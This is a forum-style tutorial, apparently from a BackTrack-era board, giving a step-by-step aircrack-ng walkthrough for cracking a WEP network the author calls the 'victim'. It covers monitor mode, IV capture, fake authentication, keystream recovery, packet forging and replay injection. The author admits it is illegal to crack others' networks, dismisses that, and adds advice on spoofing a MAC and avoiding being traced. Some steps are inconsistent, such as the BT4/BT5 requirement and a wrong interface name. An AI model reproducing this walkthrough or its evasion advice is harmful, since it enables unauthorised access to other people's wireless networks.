Video Tutorial
How to patch zydas 1211 / zd1211 chipset in order to get injection working
It took me freaking ages to get my stuff working, but finally i did.
struggle is with the hardware, i have rtl8185 which is supported by backtrack4 now !
so all you need is a copy of backtrack4-beta and you are good to go.
Toolz (OS) Needed:
Backtrack 5 (or any other linux, BT4 is suggested because it has all the tools in it) - has to be BT5 (either beta or full), under 4 will not have the drivers.
aircrack-ng suite - you do not need this if you are using backtrack 4 (its already built in), you only need it if you using other linux.
lets get down to the cracking part then.
NOTE : everyhing is done in the terminal, so if i say type, then it means into terminal !
NOTE2 : if your interface is different, then fix it first ! my main interface of wireless adapter is "wlan0" and activated rfmon mode (monitor mode) is "mon0" so my examples are with those !
1. open terminal and type
Code: Select all
airmon-ng start mon0now it says that monitor mode is enabled on mon0 (we use this now to capture)
2. now lets capture some packets by typing
Code: Select all
airodump-ng mon0press ctrl+c to stop it
now pick your 'victim' and copy the bssid of it (mac)
3. type
Code: Select all
airodump-ng --bssid 00:00:00:00:00:00 --channel 1 --ivs -w yourfile.ivs mon0--channel < look on what channel your 'victim' is/was
--ivs captures the ivs
-w output file where it saves packets (you do not need to put .ivs at end !)
mon0 < monitoring interface you activated
now let it be as it is and do not touch it
NOTE - you need at least 1 data packet to get it going, if there is no data transfered in 10 mins or so, then you can pick new 'victim' or wait until somebody connects
4. you need to authenticate your mac address with AP first ! or injection will fail.
Code: Select all
aireplay-ng -1 1 -a 00:00:00:00:00:00 mon0-1 < delay (if you are CLOSE to the WAP, then use 1, its delay, needs to be bigger if you are further away and signal is weak)
-a bssid (mac) of your victim
5a.
Code: Select all
aireplay-ng -5 -b 00:00:00:00:00:00 mon0mon0 < this is your interface you use to send packets
you need to wait until you get the keystream ! it will stop and say when its found
OR
5b.
Code: Select all
aireplay-ng -4 -b 00:00:00:00:00:00 mon0-b < bssid (mac) of your victim AP
mon0 < your monitoring interface
now wait until you get the keystream !
once its found, you can move to step 6 and close 4 and 5 (ofcourse do not forget to COPY the keystream file name !!!, it looks like keystream3232.xor)
NOTE - it seems that method 5b works better, because it seem to be needing only one packet to chopchop it and generate a keystream. extremely useful if access point does not send many data packets. like about 10 mins ago i ran into one that sent data packets very rarely.
6. lets build a packet using the keystream file
Code: Select all
packetforge-ng -0 -a (bssid) -h (put random) -l 255.255.255.255 -k 255.255.255.255 -y keystream.xor -w packet1-w < this is the output where you will save it
-h < this is your mac address (fake), you can prolly leave this out at all
-a < mac of your victim
7. now lets send some fake packets to boost the traffic
Code: Select all
aireplay-ng -3 -r packet1 -b 00:00:00:00:00:00 mon0-b < bssid of your victim again
mon0 < interface you use to send fake traffic
- How to crack when router has a flood protection
- simply add
Code: Select all
-x [number of packets per second]8. now check your first window (airodump-ng) and wait until you have about 75000-100000 packets (works FINE on WEP)
9. now we can try to crack that key, DO NOT close airodump-ng, let it capture
Code: Select all
aircrack-ng yourfile.ivsit should give you the key in less than 5 seconds !
if you didn't got it, then post your error here, because i was always successful on this point. if it says that not found or something, then maybe you didnt had enought packets, wait until you have 200000 packets ? and try again. i will include some screens here too (look below).
WARNING! I should warn you that it is illegal to crack somebody elses network, but who gives a shit these days ?! Just spoof your MAC and make sure there's no FBI vans outside who may use GPS to track the source (you).
UPDATE:
recently i discovered that i do not need to use airmon-ng at all. i can simply do "airodump-ng wlan0" and it puts my card on monitoring mode too.
UPDATE:
scratch that last update, dunno why it worked before, but now i do need to use airmon-ng, maybe some fuck-up.
anyways i found out that "delay" mentioned in "step 5" is always good to put on 1.
UPDATE:
first i tought that you need over 50000 packets to successfully crack WEP (based on what i have read about WEP cracking), but from my own experience, 20000-30000 is more than enought. ofcourse depending on the strenght of the key. I managed to crack one network with 10000 ivs ! i included the screenshot of it (last screen).
UPDATE:
i recently cracked 2 more WEPs, i was able to crack both with about 10000 ivs only. one had 12000 and other had 10000 or so.
UPDATE:
I have played around with WEP networks in past 3 days. it is kind a obvious, but still mentioning it. it is not just the antenna that matters, it is very important to have a proper card too.
for example i have tested with USB adapter and PCI adapter (TP-link with atheros chipset and some PCI card with RTL8185 chipset)
I left antenna on same place, using windows XP and PCI card, signals were quite ok. i was able to connect to the station. speedtest ping was 60ms, which is quite good, while using USB adapter and backtrack5, i barely saw the station.
i have no idea how powerful these cards are, but my guess is 500 - 1000mW, im getting a 2000mW card now. hoping it will be even better signal.
- WEP cracked with only 10000 ivs
- 10kcrack.png (39.55 KiB) Viewed 57679 times
